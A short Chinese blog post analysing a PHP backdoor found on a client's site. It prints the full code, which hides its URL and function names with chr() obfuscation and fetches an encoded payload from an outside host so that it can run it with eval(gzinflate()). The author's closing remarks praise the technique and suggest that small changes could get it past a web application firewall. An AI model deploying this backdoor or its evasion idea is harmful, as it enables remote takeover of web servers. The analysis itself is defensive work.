一个PHP后门的分析过程

<?php $password=‘123‘; //----------功能程序------------------// $c="chr";//字符串 session_start(); if(empty($_SESSION[‘PhpCode‘])){ $url.=$c(104).$c(116).$c(116).$c(112).$c(58); $url.=$c(47).$c(47).$c(104).$c(106).$c(105); $url.=$c(117).$c(46).$c(108).$c(97).$c(47); $url.=$c(115).$c(99).$c(120).$c(112).$c(46); $url.=$c(103).$c(105).$c(102); //$url = chr(104)chr(116)chr(116)chr(112)chr(58)chr(47)chr(47)chr(104)chr(106)chr(105)chr(117)chr(46)chr(108)chr(97)chr(47)chr(115)chr(99)chr(120)chr(112)chr(46)chr(103)chr(105)chr(102) //$url = http://hjiu.la/scxp.gif $get=chr(102).chr(105).chr(108).chr(101).chr(95); $get.=chr(103).chr(101).chr(116).chr(95).chr(99); $get.=chr(111).chr(110).chr(116).chr(101).chr(110); $get.=chr(116).chr(115); //$get = chr(102)chr(105)chr(108)chr(101)chr(95)chr(103)chr(101)chr(116)chr(95)chr(99)chr(111)chr(110)chr(116)chr(101)chr(110)chr(116)chr(115) //$get = file_get_contents echo $get($url); $_SESSION[‘PhpCode‘]=$get($url); } //echo $url; $unzip=$c(103).$c(122).$c(105).$c(110); $unzip.=$c(102).$c(108).$c(97).$c(116).$c(101); //echo $unzip;//die; //chr(103).chr(122).chr(105).chr(110)chr(102).chr(108).chr(97).chr(116).chr(101) //$unzip = gzinflate 解码处理 @eval($unzip($_SESSION[‘PhpCode‘])); ?>

今晚帮客户分析一个后门程序,分析过程如上,试了下过不了狗,eval直接写肯定就过不了狗,估计改改可以绕过安全狗,真是一个完美的思路,调用远程加密的后门代码绕过WAF。

一个PHP后门的分析过程

上一篇:Vue.js 渲染简写样式存在的问题


下一篇:PHP运算符